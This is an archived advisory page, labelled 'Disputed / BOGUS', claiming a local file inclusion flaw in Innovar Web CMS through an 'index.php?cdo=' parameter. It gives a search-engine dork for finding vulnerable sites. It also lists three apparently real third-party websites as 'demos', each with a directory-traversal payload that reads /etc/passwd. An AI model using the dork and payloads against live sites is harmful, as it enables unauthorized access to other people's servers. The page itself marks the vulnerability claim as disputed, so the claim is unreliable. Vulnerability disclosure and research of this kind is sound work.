Disputed / BOGUS

Innovar Web CMS Local File Inclusion Vulnerbility

Published
Credit
Risk
2012.11.10
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
CWE-98
N/A
No
Yes
Dork: intext:\"Desarrollado por Innovar Web\"

-=-=-=-=-=- In The Name Of God -=-=-=-=-=-

--------------------------------------------------------------------------------
@ Innovar Web CMS Local File Inclusion Vulnerbility
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
# Name:Innovar Web CMS Local File Inclusion Vulnerbility
# Vendor: http://www.innovarweb.com.ar/
# Date: 2012-10-22
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org
# Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Desarrollado por Innovar Web"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerability ~>

[+] Vulnerability: http://127.0.0.1/path/index.php?cdo=[Include]

[+] Demo(s) :

[+] http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd

[+] http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd

[+] http://www.ojalatesirva.com.ar/interior/index.php?cdo=../../../../../../etc/passwd

===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ PrinceOfHacking,elvator,unique2world,HidDeEn,Encoder,N4H,Classic,Zend
@ Angel--D3m0n,Azad™,HashoR,Pr0grammer,Unline


And All Ashiyane Bug ResearcherS
===========================================================================

ASHIYANE DIGITAL SECURITY TEAM

Persian Gulf F0r Ever

WE LOVE IRAN

<<./By MojiRider >>

References:

http://www.innovarweb.com.ar/
http://cxsecurity.com/issue/WLB-2012090008


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com